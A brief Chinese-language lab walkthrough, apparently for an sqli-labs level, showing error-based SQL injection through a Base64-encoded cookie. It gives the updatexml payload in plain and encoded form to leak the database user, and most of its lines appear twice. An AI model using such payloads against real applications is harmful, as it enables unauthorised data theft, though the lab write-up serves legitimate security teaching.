直入主题
这一题是在20题的基础上对cookie进行了Base64加密。
BP抓包
正常登录后刷新页面进行抓包
注入单引号
单引号加密后是 Jw==
成功触发错误
从错误信息可以直到还需要闭合一个括号
构造payload
payload:') and updatexml(1,concat(0x7c,user()),1)#
加密:JykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdjLHVzZXIoKSksMSkj
成功获取用户名
这一题是在20题的基础上对cookie进行了Base64加密。
正常登录后刷新页面进行抓包
单引号加密后是 Jw==
成功触发错误
从错误信息可以直到还需要闭合一个括号
payload:') and updatexml(1,concat(0x7c,user()),1)#
加密:JykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdjLHVzZXIoKSksMSkj
成功获取用户名